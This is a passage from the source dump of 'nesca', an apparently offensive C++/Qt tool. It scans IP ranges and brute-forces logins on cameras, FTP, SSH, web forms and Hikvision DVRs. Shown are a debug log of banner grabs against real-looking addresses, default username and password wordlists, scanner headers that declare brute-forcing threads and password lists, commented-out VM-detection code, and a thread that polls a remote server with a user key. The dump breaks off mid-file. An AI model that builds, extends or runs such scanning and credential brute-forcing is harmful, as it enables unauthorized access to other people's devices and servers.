86 | char_array_4[j] = base64_chars.find(char_array_4[j]); 87 | 88 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4); 89 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2); 90 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3]; 91 | 92 | for (j = 0; (j < i - 1); j++) ret += char_array_3[j]; 93 | } 94 | 95 | return ret; 96 | } -------------------------------------------------------------------------------- /base64.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | std::string base64_encode(unsigned char const* , unsigned int len); 4 | std::string base64_decode(std::string const& s); -------------------------------------------------------------------------------- /debugData.txt: -------------------------------------------------------------------------------- 1 | ========================== 2 | SSH-2.0-dropbear_0.48 3 | 4 | ========================== 5 | ========================== 6 | 7 | GET / HTTP/1.1 8 | Host: 222.2.124.6:21 9 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 10 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 11 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 12 | Accept-Encoding: text, identity, *;q=0 13 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 14 | Connection: close 15 | 16 | ========================== 17 | 220-MegaBit Gear TE4121C FTP server ready 18 | 220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) 19 | 530 USER and PASS required 20 | 530 USER and PASS required 21 | 22 | ========================== 23 | ========================== 24 | 25 | GET / HTTP/1.1 26 | Host: 222.2.124.25:21 27 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 28 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 29 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 30 | Accept-Encoding: text, identity, *;q=0 31 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 32 | Connection: close 33 | 34 | ========================== 35 | 220 (vsFTPd 1.2.0) 36 | 530 Please login with USER and PASS. 37 | 530 Please login with USER and PASS. 38 | 530 Please login with USER and PASS. 39 | 530 Please login with USER and PASS. 40 | 530 Please login with USER and PASS. 41 | 530 Please login with USER and PASS. 42 | 530 Please login with USER and PASS. 43 | 530 Please login with USER and PASS. 44 | 530 Please login with USER and PASS. 45 | 46 | ========================== 47 | ========================== 48 | 49 | GET / HTTP/1.1 50 | Host: 222.2.124.44:21 51 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 52 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 53 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 54 | Accept-Encoding: text, identity, *;q=0 55 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 56 | Connection: close 57 | 58 | ========================== 59 | 220-MegaBit Gear TE4121C FTP server ready 60 | 220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) 61 | 530 USER and PASS required 62 | 530 USER and PASS required 63 | 64 | ========================== 65 | ========================== 66 | 67 | GET / HTTP/1.1 68 | Host: 222.2.124.65:21 69 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 70 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 71 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 72 | Accept-Encoding: text, identity, *;q=0 73 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 74 | Connection: close 75 | 76 | ========================== 77 | 220-MegaBit Gear TE4121C FTP server ready 78 | 220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) 79 | 530 USER and PASS required 80 | 530 USER and PASS required 81 | 82 | ========================== 83 | ========================== 84 | 85 | GET / HTTP/1.1 86 | Host: 222.2.124.200:21 87 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 88 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 89 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 90 | Accept-Encoding: text, identity, *;q=0 91 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 92 | Connection: close 93 | 94 | ========================== 95 | 220-MegaBit Gear TE4121C FTP server ready 96 | 220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) 97 | 530 USER and PASS required 98 | 530 USER and PASS required 99 | 100 | ========================== 101 | ========================== 102 | 103 | GET / HTTP/1.1 104 | Host: 222.2.144.207:21 105 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 106 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 107 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 108 | Accept-Encoding: text, identity, *;q=0 109 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 110 | Connection: close 111 | 112 | ========================== 113 | 220 Simple FTPd welcomes you. 114 | 115 | 116 | 117 | ========================== 118 | ========================== 119 | 120 | GET / HTTP/1.1 121 | Host: 222.2.147.250:21 122 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 123 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 124 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 125 | Accept-Encoding: text, identity, *;q=0 126 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 127 | Connection: close 128 | 129 | ========================== 130 | 220 FTP server ready. 131 | 500 'GET' command not understood. 132 | 133 | ========================== 134 | ========================== 135 | 136 | ========================== 137 | SSH-2.0-dropbear 138 | 139 | ========================== 140 | ========================== 141 | 142 | ========================== 143 | SSH-2.0-dropbear 144 | 145 | ========================== 146 | ========================== 147 | 148 | GET / HTTP/1.1 149 | Host: 222.2.175.116:21 150 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 151 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 152 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 153 | Accept-Encoding: text, identity, *;q=0 154 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 155 | Connection: close 156 | 157 | ========================== 158 | 220 FTP server ready. 159 | 500 'GET' command not understood. 160 | 161 | ========================== 162 | ========================== 163 | 164 | GET / HTTP/1.1 165 | Host: 222.2.175.94:21 166 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 167 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 168 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 169 | Accept-Encoding: text, identity, *;q=0 170 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 171 | Connection: close 172 | 173 | ========================== 174 | 220 Simple FTPd welcomes you. 175 | 176 | 177 | 178 | ========================== 179 | ========================== 180 | 181 | GET / HTTP/1.1 182 | Host: 222.2.189.106:21 183 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 184 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 185 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 186 | Accept-Encoding: text, identity, *;q=0 187 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 188 | Connection: close 189 | 190 | ========================== 191 | 220 Simple FTPd welcomes you. 192 | 193 | 194 | 195 | ========================== 196 | ========================== 197 | 198 | ========================== 199 | SSH-2.0-OpenSSH_6.6p1-hpn14v4 200 | 201 | ========================== 202 | ========================== 203 | 204 | GET / HTTP/1.1 205 | Host: 222.3.13.167:21 206 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 207 | Accept-Language: us-US,ru;q=0.9,en;q=0.8 208 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 209 | Accept-Encoding: text, identity, *;q=0 210 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 211 | Connection: close 212 | 213 | ========================== 214 | 220 ibs-soho FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready. 215 | 500 'GET / HTTP/1.1': command not understood. 216 | 500 'HOST: 222.3.13.167:21': command not understood. 217 | 500 'ACCEPT: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1': command not understood. 218 | 500 'ACCEPT-LANGUAGE: us-US,ru;q=0.9,en;q=0.8': command not understood. 219 | 500 'ACCEPT-CHARSET: iso-8859-1, utf-8, utf-16, *;q=0.1': command not understood. 220 | 500 'ACCEPT-ENCODING: text, identity, *;q=0': command not understood. 221 | 500 'USER-AGENT: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11': command not understood. 222 | 500 'CONNECTION: close': command not understood. 223 | 500 '': command not understood. 224 | 225 | ========================== 226 | ========================== 227 | 228 | -------------------------------------------------------------------------------- /examples/old_nesca.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netstalking-core/nesca/469cdcb04cd1a7130a56974b1c85961b88b8eecc/examples/old_nesca.png -------------------------------------------------------------------------------- /externData.h: -------------------------------------------------------------------------------- 1 | #ifndef EXTERNDATA_H 2 | #define EXTERNDATA_H 3 | #include 4 | 5 | #include 6 | #define RECV_MAX_SIZE 350000 7 | #define REQUEST_MAX_SIZE 4096 8 | #define PORTSET "80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21" 9 | #define CSSOCKET(Socket) shutdown(Socket, SD_BOTH); closesocket(Socket); Socket = -1; 10 | 11 | #ifndef CP_UTF8 12 | #define CP_UTF8 65001 13 | #endif 14 | #ifndef CP_ACP 15 | #define CP_ACP 0 16 | #endif 17 | 18 | #ifndef MAX_ADDR_LEN 19 | #define MAX_ADDR_LEN 128 20 | #endif 21 | 22 | extern QJsonArray *jsonArr; 23 | 24 | extern unsigned long long gTargetsNumber; 25 | extern long long unsigned int gTargets; 26 | extern std::atomic cons, BrutingThrds, gThreads; 27 | extern char **loginLst, **passLst, 28 | **wfLoginLst, **wfPassLst, 29 | **ftpLoginLst, **ftpPassLst, 30 | **sshlpLst; 31 | extern bool trackerOK, globalScanFlag, MapWidgetOpened, 32 | widgetIsHidden, gNegDebugMode, 33 | gDebugMode, horLineFlag, gPingNScan, gShuffle, 34 | BALogSwitched; 35 | extern int found, indexIP, gMode, 36 | MaxPass, MaxLogin, 37 | MaxWFLogin, MaxWFPass, 38 | MaxFTPLogin, MaxFTPPass, 39 | MaxSSHPass, 40 | gMaxBrutingThreads, 41 | gTimeOut, PieCamerasC1, PieOther, PieBA, PieSSH, 42 | camerasC1, filtered, Overl, Alive, saved, 43 | other, 44 | baCount, 45 | ssh, globalPinger, gPingTimeout, 46 | cIndex; 47 | extern unsigned int Activity; 48 | extern char trcSrv[256], trcScr[256], trcProxy[128], trcPersKey[64], 49 | trcPort[32], trcSrvPortLine[32], 50 | gTLD[128], gPorts[65536], 51 | gProxyIP[64], gProxyPort[8], 52 | currentIP[MAX_ADDR_LEN], 53 | finalIP[32]; 54 | 55 | extern char gVER[32]; 56 | 57 | #endif // EXTERNDATA 58 | -------------------------------------------------------------------------------- /externFunctions.h: -------------------------------------------------------------------------------- 1 | #ifndef EF_H 2 | #define EF_H 3 | 4 | #include 5 | 6 | extern std::string toLowerStr(const char *str); 7 | extern char* strstri(const char *_Str, const char *_SubStr); 8 | 9 | #endif // EF_H 10 | -------------------------------------------------------------------------------- /ftplogin.txt: -------------------------------------------------------------------------------- 1 | admin 2 | root 3 | ftp 4 | anonymous -------------------------------------------------------------------------------- /ftppass.txt: -------------------------------------------------------------------------------- 1 | 12345 2 | root 3 | admin 4 | password 5 | 123456 6 | 1234 7 | 8 | 9 | ftp 10 | 123123 11 | pass 12 | qwerty 13 | admin123 14 | 123321 15 | 12344321 16 | toor 17 | qwerty123 18 | 1q2w3e4r 19 | 987654321 20 | 111111 21 | 1111 22 | 654321 23 | !@#$%^ 24 | 0000 25 | 000000 26 | 12345678 27 | 666666 28 | 888888 29 | 777777 30 | 555555 31 | 111222333 32 | 123123123 33 | 123454321 34 | 0123456789 35 | guest 36 | backup -------------------------------------------------------------------------------- /login.txt: -------------------------------------------------------------------------------- 1 | admin 2 | root 3 | 123123 4 | 123456 5 | 12345 6 | ubnt 7 | 8 | 9 | cisco 10 | super 11 | meinsm 12 | monitor 13 | test 14 | support 15 | 1234 16 | administrator 17 | qwerty 18 | recovery 19 | system 20 | naadmin 21 | master 22 | guest 23 | backup 24 | 0000 25 | 1111 26 | 123321 27 | 123321123 28 | 111111 29 | 222222 30 | 333333 31 | 444444 32 | 666666 33 | 888888 34 | 88888888 35 | 999999 36 | 777777 37 | 555555 38 | 111222333 -------------------------------------------------------------------------------- /main.cpp: -------------------------------------------------------------------------------- 1 | #include "nesca_3.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "Utils.h" 7 | #include "externData.h" 8 | 9 | int main(int argc, char *argv[]) 10 | { 11 | bool isWM = false; 12 | //DWORD Type; 13 | //char value[512] = { 0 }; 14 | //char resultString[512] = { 0 }; 15 | //HKEY hkey; 16 | //if (RegOpenKey(HKEY_LOCAL_MACHINE, 17 | // TEXT("HARDWARE\\DESCRIPTION\\System"), &hkey) == ERROR_SUCCESS) 18 | //{ 19 | // DWORD value_length = 512; 20 | // RegQueryValueEx(hkey, L"VideoBiosVersion", 0, &Type, (BYTE*)&value, &value_length); 21 | // RegCloseKey(hkey); 22 | 23 | // for (int i = 0, j = 0; i < 256; ++i, j += 2) { 24 | // char ch = value[j]; 25 | // if (ch != '\0') { 26 | // resultString[i] = ch; 27 | // } 28 | // else { 29 | // resultString[i] = '\n'; 30 | // } 31 | // } 32 | // resultString[256] = '\0'; 33 | //} 34 | //if (strstr(resultString, "VirtualBox") || 35 | // strstr(resultString, "virtualbox")) { 36 | // isWM = true; 37 | //}; 38 | 39 | QApplication a(argc, argv); 40 | 41 | if (isWM) { 42 | //QMessageBox msgBox( 43 | // QMessageBox::Information, 44 | // "Nope", 45 | // ""); 46 | //QPalette palette; 47 | //palette.setBrush(QPalette::Background, Qt::cyan); 48 | //msgBox.setIconPixmap(QPixmap(":/nesca_3/xc.jpg")); 49 | //msgBox.setPalette(palette); 50 | //msgBox.setVisible(true); 51 | //msgBox.exec(); 52 | } else { 53 | QStringList list; 54 | list << "small_font.ttf"; 55 | int fontID(-1); 56 | bool fontWarningShown(false); 57 | for (QStringList::const_iterator constIterator = list.constBegin(); constIterator != list.constEnd(); ++constIterator) { 58 | QFile res(":/nesca_3/" + *constIterator); 59 | if (res.open(QIODevice::ReadOnly) == false) { 60 | if (fontWarningShown == false) { 61 | fontWarningShown = true; 62 | } 63 | } 64 | else { 65 | fontID = QFontDatabase::addApplicationFontFromData(res.readAll()); 66 | if (fontID == -1 && fontWarningShown == false) { 67 | fontWarningShown = true; 68 | } 69 | } 70 | } 71 | 72 | nesca_3 *gui = new nesca_3(isWM, 0); 73 | //if (isWM) { 74 | // Utils::emitScaryError(); 75 | //} 76 | gui->showNormal(); 77 | } 78 | return a.exec(); 79 | } 80 | 81 | -------------------------------------------------------------------------------- /mainResources.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "base64.h" 3 | #include "libssh/libssh.h" 4 | #include 5 | #include 6 | #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) 7 | #include "iostream" 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #define GetCurrentDir _getcwd 14 | #else 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | #define GetCurrentDir getcwd 36 | #define ZeroMemory(Destination,Length) memset((Destination),0,(Length)) 37 | #define Sleep(msecs) usleep((msecs)*1000) 38 | #define WSAGetLastError() errno 39 | #define closesocket(sock) ::close((sock)) 40 | 41 | typedef unsigned int DWORD; 42 | typedef void* LPVOID; 43 | typedef void* HANDLE; 44 | typedef unsigned int UINT; 45 | typedef const char * LPCSTR; 46 | typedef int SOCKET; 47 | typedef hostent HOSTENT; 48 | typedef struct linger LINGER; 49 | typedef int BOOL; 50 | 51 | #define SD_BOTH 0x02 52 | #ifndef FAR 53 | #define FAR far 54 | #endif 55 | 56 | #ifndef INVALID_SOCKET 57 | #define INVALID_SOCKET (SOCKET)(~0) 58 | #endif 59 | #ifndef SOCKET_ERROR 60 | #define SOCKET_ERROR (-1) 61 | #endif 62 | #ifndef WSAEWOULDBLOCK 63 | #define WSAEWOULDBLOCK EWOULDBLOCK //10035 64 | #endif 65 | #ifndef WSAEINPROGRESS 66 | #define WSAEINPROGRESS EINPROGRESS //10036 67 | #endif 68 | #ifndef WSAENOTSOCK 69 | #define WSAENOTSOCK ENOTSOCK //10038 70 | #endif 71 | #ifndef WSAEADDRNOTAVAIL 72 | #define WSAEADDRNOTAVAIL EADDRNOTAVAIL //10049 73 | #endif 74 | #ifndef WSAECONNRESET 75 | #define WSAECONNRESET ECONNRESET //10054 76 | #endif 77 | #ifndef WSAENOBUFS 78 | #define WSAENOBUFS ENOBUFS //10055 79 | #endif 80 | #ifndef WSAETIMEDOUT 81 | #define WSAETIMEDOUT ETIMEDOUT //10060 82 | #endif 83 | #ifndef WSAECONNREFUSED 84 | #define WSAECONNREFUSED ECONNREFUSED //10061 85 | #endif 86 | 87 | #endif 88 | 89 | #define TITLE_MAX_SIZE 512 90 | #define COOKIE_MAX_SIZE 1024 91 | #define TYPE1 "camera" 92 | #define TYPE2 "other" 93 | #define TYPE3 "auth" 94 | #define TYPE4 "ftp" 95 | #define TYPE5 "ssh" 96 | #define DIR_NAME "results_" 97 | 98 | #define PWD_LIST_FOLDER "./pwd_lists/" 99 | #define LOGIN_FN PWD_LIST_FOLDER "login.txt" 100 | #define PASS_FN PWD_LIST_FOLDER "pass.txt" 101 | #define FTP_LOGIN_FN PWD_LIST_FOLDER "ftplogin.txt" 102 | #define FTP_PASS_FN PWD_LIST_FOLDER "ftppass.txt" 103 | #define WF_LOGIN_FN PWD_LIST_FOLDER "wflogin.txt" 104 | #define WF_PASS_FN PWD_LIST_FOLDER "wfpass.txt" 105 | #define SSH_PASS_FN PWD_LIST_FOLDER "sshpass.txt" 106 | #define NEGATIVE_FN PWD_LIST_FOLDER "negatives.txt" 107 | 108 | #define HTTP_FILE_STYLE "" 118 | 119 | #define HTTP_FILE_HEADER "
." TYPE1 " \ 120 | ." TYPE2 " \ 121 | ." TYPE3 " \ 122 | ." TYPE4 " \ 123 | ." TYPE5 " \ 124 |


" 125 | 126 | #ifndef MAX_ADDR_LEN 127 | #define MAX_ADDR_LEN 128 128 | #endif 129 | 130 | #ifndef WIN32 131 | #define __stdcall 132 | #endif 133 | 134 | struct NET_DVR_DEVICEINFO_V30 135 | { 136 | unsigned char sSerialNumber; //序列号 137 | unsigned char byAlarmInPortNum; //报警输入个数 138 | unsigned char byAlarmOutPortNum; //报警输出个数 139 | unsigned char byDiskNum; //硬盘个数 140 | unsigned char byDVRType; //设备类型, 1:DVR 2:ATM DVR 3:DVS ...... 141 | unsigned char byChanNum; //模拟通道个数 142 | unsigned char byStartChan; //起始通道号,例如DVS-1,DVR - 1 143 | unsigned char byAudioChanNum; //语音通道数 144 | unsigned char byIPChanNum; //最大数字通道个数 145 | unsigned char byZeroChanNum; //零通道编码个数 //2010-01-16 146 | unsigned char byMainProto; //主码流传输协议类型 0-private, 1-rtsp 147 | unsigned char bySubProto; //子码流传输协议类型0-private, 1-rtsp 148 | unsigned char bySupport; //能力,位与结果为0表示不支持,1表示支持, 149 | unsigned char bySupport1; // 能力集扩充,位与结果为0表示不支持,1表示支持 150 | unsigned char byRes1; 151 | int wDevType; //设备型号 152 | 153 | unsigned char byRes2; //保留 154 | }; 155 | 156 | struct PathStr{ 157 | char codepage[32]; 158 | char headr[TITLE_MAX_SIZE]; 159 | char path[1024]; 160 | int flag; 161 | int port; 162 | char ip[MAX_ADDR_LEN]; 163 | char cookie[COOKIE_MAX_SIZE]; 164 | int directoryCount; 165 | }; 166 | 167 | struct lopaStr{ 168 | char login[128]; 169 | char pass[32]; 170 | char other[128]; 171 | }; 172 | 173 | class Lexems 174 | { 175 | public: 176 | int iterationCount, flag; 177 | 178 | Lexems() 179 | { 180 | iterationCount = 0; 181 | flag = 0; 182 | } 183 | 184 | ~Lexems() 185 | { 186 | iterationCount = 0; 187 | } 188 | 189 | /*int getHeader(char *ip, 190 | int port, 191 | const char str[], 192 | Lexems *l, 193 | PathStr *ps, 194 | std::vector *lst, int size);*/ 195 | 196 | int filler(char* ip, char *ipRaw, 197 | int port, 198 | std::string *buffcpy, 199 | int size, 200 | Lexems *lx); 201 | }; 202 | 203 | //Hikvision SDK extern functions 204 | //typedef int(__stdcall *f_func)(); 205 | typedef void(__stdcall *NET_DVR_Init)(); 206 | typedef void(__stdcall *NET_DVR_Cleanup)(); 207 | typedef int(__stdcall *NET_DVR_Login_V30)(const char * sDVRIP, 208 | int wDVRPort, 209 | const char * sUserName, 210 | const char * sPassword, 211 | NET_DVR_DEVICEINFO_V30 *lpDeviceInfo); 212 | 213 | extern NET_DVR_Init hik_init_ptr; 214 | extern NET_DVR_Cleanup hik_cleanup_ptr; 215 | extern NET_DVR_Login_V30 hik_login_ptr; 216 | 217 | -------------------------------------------------------------------------------- /msgcheckerthread.cpp: -------------------------------------------------------------------------------- 1 | #include "msgcheckerthread.h" 2 | #include "externData.h" 3 | #include "mainResources.h" 4 | #include "Utils.h" 5 | #include "Connector.h" 6 | 7 | void MSGCheckerThread::doEmitionShowNewMsg(QString str) 8 | { 9 | emit mct->showNewMsg(str); 10 | } 11 | 12 | void _getNewMsg() 13 | { 14 | char request[256] = {0}; 15 | sprintf(request, "http://nesca.d3w.org/mailbox?key=%s", trcPersKey); 16 | 17 | std::string buffer; 18 | std::vector headerVector {"X-Nescav3: True"}; 19 | 20 | Connector con; 21 | con.nConnect(request, 80, &buffer, NULL, &headerVector); 22 | 23 | char *ptr1 = NULL; 24 | if(buffer.size() > 0) 25 | { 26 | if(Utils::ustrstr(buffer, std::string("\r\n\r\n")) != -1 27 | && Utils::ustrstr(buffer, std::string("404 Not Found")) == -1 28 | && Utils::ustrstr(buffer, std::string("502 Bad Gateway")) == -1 29 | && Utils::ustrstr(buffer, std::string("400 Bad Request")) == -1 30 | && Utils::ustrstr(buffer, std::string("\r\n\r\nEmpty")) == -1 31 | ) 32 | { 33 | ptr1 = strstr((char*)buffer.c_str(), "\r\n\r\n"); 34 | if(strlen(ptr1 + 4) != 0) 35 | { 36 | mct->doEmitionShowNewMsg(QString(ptr1 + 4)); 37 | }; 38 | } 39 | }; 40 | } 41 | 42 | void MSGCheckerThread::run() 43 | { 44 | if (!msgChkRunnning) { 45 | for (;;) 46 | { 47 | msgChkRunnning = true; 48 | if (strlen(trcPersKey) != 0) _getNewMsg(); 49 | //else { mct->doEmitionShowNewMsg(QString("No key detected.")); } 50 | Sleep(60000); 51 | }; 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /msgcheckerthread.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef MSGCHECKERTHREAD_H 3 | #define MSGCHECKERTHREAD_H 4 | 5 | #include "nesca_3.h" 6 | 7 | class MSGCheckerThread : public QThread 8 | { 9 | private: bool msgChkRunnning = false; 10 | Q_OBJECT 11 | public: 12 | static void doEmitionShowNewMsg(QString str); 13 | public: signals: void showNewMsg(QString); 14 | 15 | protected: 16 | void run(); 17 | }; 18 | extern MSGCheckerThread *mct; 19 | 20 | #endif // MSGCHECKERTHREAD_H 21 | -------------------------------------------------------------------------------- /negatives.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netstalking-core/nesca/469cdcb04cd1a7130a56974b1c85961b88b8eecc/negatives.txt -------------------------------------------------------------------------------- /nesca.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netstalking-core/nesca/469cdcb04cd1a7130a56974b1c85961b88b8eecc/nesca.ico -------------------------------------------------------------------------------- /nesca.pro: -------------------------------------------------------------------------------- 1 | #------------------------------------------------- 2 | # 3 | # Project created by QtCreator 2015-02-24T13:25:33 4 | # 5 | #------------------------------------------------- 6 | 7 | QT += core gui multimedia 8 | 9 | greaterThan(QT_MAJOR_VERSION, 4): QT += widgets 10 | 11 | CONFIG += c++11 12 | QMAKE_CFLAGS += -Wno-write-strings 13 | QMAKE_CXXFLAGS += -Wno-write-strings -Wno-narrowing -fpermissive 14 | 15 | TARGET = nesca 16 | TEMPLATE = app 17 | #INCLUDEPATH += /opt/Qt5.3.2/5.3/gcc_64/include/QtWidgets/ 18 | SOURCES +=\ 19 | main.cpp \ 20 | nesca_3.cpp \ 21 | ActivityDrawerTh_HorNet.cpp \ 22 | base64.cpp \ 23 | CheckKey_Th.cpp \ 24 | DrawerTh_GridQoSScanner.cpp \ 25 | DrawerTh_HorNet.cpp \ 26 | DrawerTh_ME2Scanner.cpp \ 27 | DrawerTh_QoSScanner.cpp \ 28 | DrawerTh_VoiceScanner.cpp \ 29 | msgcheckerthread.cpp \ 30 | piestat.cpp \ 31 | progressbardrawer.cpp \ 32 | STh.cpp \ 33 | vercheckerthread.cpp \ 34 | finder.cpp \ 35 | WebformWorker.cpp \ 36 | Connector.cpp \ 37 | Utils.cpp \ 38 | BruteUtils.cpp \ 39 | BasicAuth.cpp \ 40 | FTPAuth.cpp \ 41 | Threader.cpp \ 42 | SSHAuth.cpp \ 43 | FileUpdater.cpp \ 44 | FileDownloader.cpp \ 45 | MainStarter.cpp \ 46 | IPRandomizer.cpp \ 47 | HikvisionLogin.cpp \ 48 | RTSP.cpp \ 49 | IPCAuth.cpp 50 | 51 | 52 | HEADERS += nesca_3.h \ 53 | ActivityDrawerTh_HorNet.h \ 54 | base64.h \ 55 | CheckKey_Th.h \ 56 | DrawerTh_GridQoSScanner.h \ 57 | DrawerTh_HorNet.h \ 58 | DrawerTh_ME2Scanner.h \ 59 | DrawerTh_QoSScanner.h \ 60 | DrawerTh_VoiceScanner.h \ 61 | externData.h \ 62 | externFunctions.h \ 63 | mainResources.h \ 64 | msgcheckerthread.h \ 65 | piestat.h \ 66 | progressbardrawer.h \ 67 | resource.h \ 68 | STh.h \ 69 | vercheckerthread.h \ 70 | Utils.h \ 71 | WebformWorker.h \ 72 | Connector.h \ 73 | BasicAuth.h \ 74 | BruteUtils.h \ 75 | FTPAuth.h \ 76 | Threader.h \ 77 | SSHAuth.h \ 78 | FileUpdater.h \ 79 | FileDownloader.h \ 80 | MainStarter.h \ 81 | IPRandomizer.h \ 82 | HikvisionLogin.h \ 83 | RTSP.h \ 84 | IPCAuth.h 85 | 86 | FORMS += nesca_3.ui 87 | 88 | RESOURCES += \ 89 | nesca_3.qrc 90 | 91 | OTHER_FILES += \ 92 | nesca_3.rc 93 | 94 | 95 | unix|win32: LIBS += -lssh 96 | 97 | unix|win32: LIBS += -lcrypto 98 | 99 | unix|win32: LIBS += -lcurl 100 | -------------------------------------------------------------------------------- /nesca_3.h: -------------------------------------------------------------------------------- 1 | #ifndef nesca_3_H 2 | #define nesca_3_H 3 | 4 | //Include windows.h ONLY *after* qdatetime.h 5 | //Bug: https://bugreports.qt.io/browse/QTBUG-31469 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #if defined(WIN32) 19 | #include 20 | #endif 21 | 22 | 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | extern Ui::nesca_3Class *ui; 29 | extern bool widgetIsHidden, QOSWait, 30 | ME2ScanFlag, QoSScanFlag, VoiceScanFlag, PieStatFlag, 31 | smBit_8, smBit_7, smBit_6, smBit_5, smBit_4, smBit_3, smBit_2, smBit_1; 32 | extern float QoSStep; 33 | 34 | extern QVector vAlivLst, vAnomLst, vWFLst, vSuspLst, vLowlLst, vBALst, vSSHLst, vOvrlLst, actLst; 35 | extern QList lstOfLabels; 36 | extern QSystemTrayIcon *tray; 37 | 38 | extern QStandardItemModel *BAModel; 39 | 40 | class nesca_3 : public QMainWindow 41 | { 42 | Q_OBJECT 43 | 44 | public: 45 | nesca_3(bool 